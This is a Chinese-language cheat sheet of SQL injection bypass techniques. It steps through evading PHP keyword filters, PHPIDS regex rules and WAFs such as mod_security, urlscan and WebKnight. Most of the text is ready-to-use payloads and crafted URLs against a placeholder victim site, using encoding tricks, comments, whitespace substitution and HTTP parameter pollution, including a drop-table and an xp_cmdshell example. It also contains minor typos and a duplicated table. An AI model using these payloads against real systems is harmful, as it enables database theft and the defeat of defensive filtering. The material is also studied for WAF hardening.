绕过函数和关键字过滤
- and, or
Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1 && 1 = 1
- and, or, union
PHP filter code: preg_match('/(and|or|union)/i', $id)
union查询经常用来爆数据,被和谐了之后只能通过布尔方式注入了
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
- and, or, union, where
PHP filter code: preg_match('/(and|or|union|where)/i', $id)
可以通过limit m,n定位是第几条数据
其中m是指记录开始的index,从0开始,表示第一条记录,n是指从第m+1条开始,取n条。
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
- and, or, union, where, limit
PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)
`group by`故名思意就是分组,一个id一个组。
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
- and, or, union, where, limit, group by
PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
GROUP_CONCAT函数返回一个字符串结果,该结果由分组中的值连接组合而成。substr就是截取字符了。
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
- and, or, union, where, limit, group by, select
过滤代码就省略了,跟上面相比多了个select
into outfile导出结果到指定文件,前提是能够访问的到吧,而且都能这样了还不如直接getshell?
而且没有了select之后,如果列名不在前面的查询语句的表中就没用了。
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'
- and, or, union, where, limit, group by, select, 单引号
多了个unhex(),16进制的匹配
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)
- and, or, union, where, limit, group by, select, ', hex
CONV(N,from_base,to_base)该函数返回值N从from_base到to_base进制转换的字符串。最小基数值是2,最大值为36。
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
- and, or, union, where, limit, group by, select, ', hex, substr
lpad(str,len,padstr)返回字符串str,左填充用字符串padstr填补到len字符长度。 如果str为大于len长,返回值被缩短至len个字符(即,不能超过 len 长)。
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
- and, or, union, where, limit, group by, select, ', hex, substr, 空白符
Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)
绕过正则过滤
PHPIDS 通常会干掉包含了 = or ( or ' 后面跟着数字或字符的例如 1 or 1=1, 1 or '1', 1 or char(97). 然而,it can be bypassed using a statement that does not contain =, ( or ' symbols.
会被干掉的:
1 union select 1, table_name from information_schema.tables where table_name = 'users'
1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
可以绕过的
1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
绕过waf
- 注释符
http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3-- - 大小写
http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3-- - 关键字替换
http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
插入空白符
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
ps,如果碰到url重写的话/**/是不能用的
http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
要换成%0b
http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html - 双重编码
http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
mod_security
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
绕过
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
我们看看发生了什么
mysql支持三种注释符 #、-- 、/**/,这里还用了%0D%0A进行换行
在waf看来,语句是这样的
0 div 1 union#foo*/*/bar
select#foo
1,2,current_user
在数据库看来,语句是这样的0 div 1 union select 1,2,current_user
- 缓冲区溢出
http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141 414141414141 .)+union+select+1,2,version(),database(),user(),6,7,8,9,10-- - 内联注释(常见于过狗注入)
http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables /*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
更高级的绕过方式
-
http参数污染(HTTP Parameter Pollution: Split and Join)
http://victim.com/search.aspx?par1=val1&par1=val2
简单的说,对于waf取得值是val1,而对于web服务器取得的值是val2,亦或者是val1,val2的组合Web Server Parameter Interpretation Example ASP.NET/IIS Concatenation by comma par1=val1,val2 ASP/IIS Concatenation by comma par1=val1,val2 PHP/Apache The last param is resulting par1=val2 JSP/Tomcat The first param is resulting par1=val1 Perl/Apache The first param is resulting par1=val1 DBMan Concatenation by two tildes par1=val1~~val2
bypass mod_security
这个url妥妥的会被拦截
http://victim.com/search.aspx?q=select name,password from users
用上参数污染就绕过了
http://victim.com/search.aspx?q=select name&q=password from users
waf眼中是这样的
q=select name
q=password from users
iis眼中却是这样的q=select name,password from users
- http参数污染2(HTTP Parameter Contamination)
就是利用web服务器和waf对http请求的认知的差异来绕过waf。
RFC 2396定义了这样的东西
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved: ; / ? : @ & = + $ ,
Unwise: { } | \ ^ [ ] `
| Query String | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
|---|---|---|
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test%00=1 | test=1 | test=1 |
| ?test=1%001 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |
| Keywords | WAF | ASP/ASP.NET |
|---|---|---|
| sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. |
| ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx |
| <scr%ipt> | <scr%ipt> | <script> |
| <if%rame> | <if%rame> | <iframe> |
asp和asp.net独有的%号绕过
| Keywords | WAF | ASP/ASP.NET |
|---|---|---|
| sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. |
| ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx |
| <scr%ipt> | <scr%ipt> | <script> |
| <if%rame> | <if%rame> | <iframe> |
bypass mod_security
Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell
bypass urlscan
Forbidden: http://localhost/test.asp?file=../bla.txt
Bypassed : http://localhost/test.asp?file=.%./bla.txt
Bypass AQTRONIX Webknight(也是360主机卫士IIS版)
Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
